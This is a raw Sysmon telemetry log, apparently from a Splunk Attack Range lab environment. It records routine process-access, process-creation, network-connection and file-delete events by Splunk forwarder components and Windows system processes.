07:52:31.835{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081702Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B2BF-615A-5101-00000000FD01}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081701Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.835{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2BF-615A-5101-00000000FD01}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081700Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.836{2FDD8D40-B2BF-615A-5101-00000000FD01}1224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081699Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:29.685{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50050-false10.0.1.12-8000- 354300x800000000000000081698Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:29.216{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50049-false10.0.1.12-8089- 10341000x800000000000000081697Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2BF-615A-5001-00000000FD01}1228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081696Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081695Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081694Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081693Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081692Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081691Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B2BF-615A-5001-00000000FD01}1228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081690Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081689Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081688Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081687Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081686Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.335{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2BF-615A-5001-00000000FD01}1228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081685Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:31.336{2FDD8D40-B2BF-615A-5001-00000000FD01}1228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103867Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:32.370{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EADD05C64ECCCAFB3242E8733673BDC7,SHA256=F6037F293E0D4AB793CEC4FE0C1E430FB6C0754B05778ECCEC35ED65FBAAEBCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081716Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:32.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=958FBDE6ED00F8408310315DF570D626,SHA256=2EBF5666FA14BEA65D8E6A0A35FB1BDA9DD33C09B120DA8CD537DAEC4119829E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081715Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:32.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62E3FBF5C5FE72E2BE4D35127A90E962,SHA256=7646A23B6F64B8A2F8C191DA8D1CCDAB79DE08A5C41A1B7BB5C88DA9B0D6F964,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081714Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:32.023{2FDD8D40-B2BF-615A-5101-00000000FD01}1224724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103866Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:32.042{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B7F8537E166D6F1AE09654269B28C5E3,SHA256=CDFBAF697DA876654E6F25973F32B983E8B14D34F5619783A926018FE5BDA404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081730Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6E6FB739C97F45EF0C6BB87512EA0B,SHA256=027F523E2B12BDDD91AF026B8B4C184B8DC6D6B6126BA7B09D1A031DE5A2CE4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081729Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2C1-615A-5201-00000000FD01}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081728Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081727Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081726Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081725Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081724Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 